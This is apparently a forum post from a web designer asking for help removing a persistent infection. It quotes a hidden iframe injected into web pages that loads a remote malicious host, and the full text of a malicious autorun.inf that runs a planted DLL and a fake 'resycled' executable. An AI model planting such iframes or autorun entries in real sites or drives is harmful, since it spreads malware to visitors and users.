I don't even know where to begin on this one.

First off, my computer has been acting up a lot lately. Let me note that I am a web designer and I've come across a big error lately.

Basically every web page on my computer now says "<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>" repeatedly throughout the page. I've done a little of research on this and I would like to know the best way to get rid of it. I need to get rid of this virus ASAP because I have a deadline on a web site that I have to need to finish by and I can't upload anything to the server until I am sure this problem is gone. Also, if I delete the lines from the file, it just adds them back.

Next, I have been encountering a lot of strange things when I open the task manager. Here is the log from HijackThis:

Logfile of HijackThis v1.99.1

This is while all programs are closed except for HijackThis.exe.

Some things I've noticed is:

1. Internet Explorer is not running but it is on the log 4 times.
2. Why is the capitalization different on each instance of Internet Explorer?
3. Isn't winlogon.exe supposed to close after logged in?
4. reader_s.exe showed up as spyware and I deleted it but it's already back.
5. Is it necessary to run svchost.exe as 14 processes? I know I had an error with svchost.exe a long time ago but I don't want to mess with it because I know it is an important process.
6. Why is system32 capitalized sometimes but not others?
7. On the second list (The list under the processes. I guess it's services.?), I noticed that there are some things that I don't even have installed anymore. Where would I go to get rid of these.

Now on to my next problem.

When I click to open the C:\ drive, I get "C:\ Access is denied". This is annoying because before that, it kept trying to open C:\resycled\boot.com (yes it was spelled that way) and it came up saying "C:\resycled\boot.com is not a valid win application" or something along those lines. I think the problem is that it added an autorun file that tried to open it. I finally got rid of that problem but just to get another file.

The only way I can open my C:\ drive now is to right click and click explore. Just today, it added "`ò¿ª(O)" to the list which I don't understand. The autorun file now says:

[autorun]
;(null)
shellexecute=RunDll32.exe .\SysInfo2.Dll,MyFun
;(null)
shell\Open\command="resycled\boot.com c:"
;(null)
shell=Open
open=RunDll32.exe .\SysInfo2.Dll,MyFun
shell\1=´ò¿ª(&O)
shell\1\Command=RunDll32.exe .\SysInfo2.Dll,MyFun
;(null)

I don't know how to change the autorun file because the only way I can open it is to go to "C:\autorun.inf" via the address bar and if I save it, it just file can't be saved because it is read only.

Please help me out with one of my problems because if I can't get it figured out soon, I am going to have to wipe out everything and start over after backing up everything important on my external hard drive. I really don't want to do this though because there is some stuff I don't want to lose.

I also wanted to add that on my computer, I have McAfee AntiSpyware, SUPERAntispyways, and Malwarebytes' Anti-Malware. None have been able to get rid of any problems though.
